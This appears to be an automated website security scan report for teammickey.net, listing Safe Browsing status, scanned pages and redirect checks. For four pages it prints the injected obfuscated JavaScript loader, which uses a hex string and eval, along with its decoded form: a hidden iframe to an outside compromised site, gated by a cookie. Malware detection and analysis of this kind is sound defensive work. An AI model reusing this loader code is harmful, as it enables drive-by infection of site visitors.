Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=teammickey.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://teammickey.net/ | 200 OK Content-Length: 3305 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function DAE580CFF(DB92B0FC514){var EC8D9F3=380;EC8D9F3=EC8D9F3-364;return(parseInt(DB92B0FC514,EC8D9F3));}function DD3718D(D9C8E56BC7){var CFD0C8EF=661;CFD0C8EF=CFD0C8EF-659;var C42663D07DC2="";for(C1A8B3A2A9071F7=0;C1A8B3A2A9071F7<D9C8E56BC7.length;C1A8B3A2A9071F7+=CFD0C8EF){C42663D07DC2+=( String.fromCharCode(DAE580CFF(D9C8E56BC7.substr(C1A8B3A2A9071F7,CFD0C8EF))));}eval(C42663D07DC2);}DD3718D("69662028646F63756D656E742E636F6F6B69652E73656172636828226B6A6F76653D382229203D3D202D3129207B0A79 Decoded script: if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} Antivirus reports:
| ||
http://teammickey.net/index2.htm | 200 OK Content-Length: 3453 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function DAE580CFF(DB92B0FC514){var EC8D9F3=380;EC8D9F3=EC8D9F3-364;return(parseInt(DB92B0FC514,EC8D9F3));}function DD3718D(D9C8E56BC7){var CFD0C8EF=661;CFD0C8EF=CFD0C8EF-659;var C42663D07DC2="";for(C1A8B3A2A9071F7=0;C1A8B3A2A9071F7<D9C8E56BC7.length;C1A8B3A2A9071F7+=CFD0C8EF){C42663D07DC2+=( String.fromCharCode(DAE580CFF(D9C8E56BC7.substr(C1A8B3A2A9071F7,CFD0C8EF))));}eval(C42663D07DC2);}DD3718D("69662028646F63756D656E742E636F6F6B69652E73656172636828226B6A6F76653D382229203D3D202D3129207B0A79 Decoded script: if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} Antivirus reports:
| ||
http://teammickey.net/tencennial.html | 200 OK Content-Length: 4885 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function DAE580CFF(DB92B0FC514){var EC8D9F3=380;EC8D9F3=EC8D9F3-364;return(parseInt(DB92B0FC514,EC8D9F3));}function DD3718D(D9C8E56BC7){var CFD0C8EF=661;CFD0C8EF=CFD0C8EF-659;var C42663D07DC2="";for(C1A8B3A2A9071F7=0;C1A8B3A2A9071F7<D9C8E56BC7.length;C1A8B3A2A9071F7+=CFD0C8EF){C42663D07DC2+=( String.fromCharCode(DAE580CFF(D9C8E56BC7.substr(C1A8B3A2A9071F7,CFD0C8EF))));}eval(C42663D07DC2);}DD3718D("69662028646F63756D656E742E636F6F6B69652E73656172636828226B6A6F76653D382229203D3D202D3129207B0A79 Decoded script: if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} Antivirus reports:
| ||
http://teammickey.net/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://teammickey.net/epcot.html | 200 OK Content-Length: 4080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function DAE580CFF(DB92B0FC514){var EC8D9F3=380;EC8D9F3=EC8D9F3-364;return(parseInt(DB92B0FC514,EC8D9F3));}function DD3718D(D9C8E56BC7){var CFD0C8EF=661;CFD0C8EF=CFD0C8EF-659;var C42663D07DC2="";for(C1A8B3A2A9071F7=0;C1A8B3A2A9071F7<D9C8E56BC7.length;C1A8B3A2A9071F7+=CFD0C8EF){C42663D07DC2+=( String.fromCharCode(DAE580CFF(D9C8E56BC7.substr(C1A8B3A2A9071F7,CFD0C8EF))));}eval(C42663D07DC2);}DD3718D("69662028646F63756D656E742E636F6F6B69652E73656172636828226B6A6F76653D382229203D3D202D3129207B0A79 Decoded script: if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} if (document.cookie.search("kjove=8") == -1) { yadc=document.getElementById('vbtv');if(yadc==null){document.write('<iframe id=vbtv src=http://momscashblog.com/wp-content/plugins/alinks/xmlrpc.php style=display:none></iframe>');} document.cookie = "kjove=8;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";} Antivirus reports:
| ||
http://teammickey.net/opendayepcot.wma | 200 OK Content-Length: 300879 Content-Type: audio/x-ms-wma | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: teammickey.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 01:15:27 GMT
Accept-Ranges: bytes
ETag: "2b9d385-ce9-451d56937ef80"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 3305
Content-Type: text/html
Last-Modified: Sat, 12 Jul 2008 15:35:42 GMT
...3305 bytes of data.
GET / HTTP/1.1
Host: teammickey.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 01:15:27 GMT
Accept-Ranges: bytes
ETag: "2b9d385-ce9-451d56937ef80"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 3305
Content-Type: text/html
Last-Modified: Sat, 12 Jul 2008 15:35:42 GMT
...3305 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: teammickey.net
Referer: http://www.google.com/search?q=teammickey.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: teammickey.net
Referer: http://www.google.com/search?q=teammickey.net
Result:
The result is similar to the first query. There are no suspicious redirects found.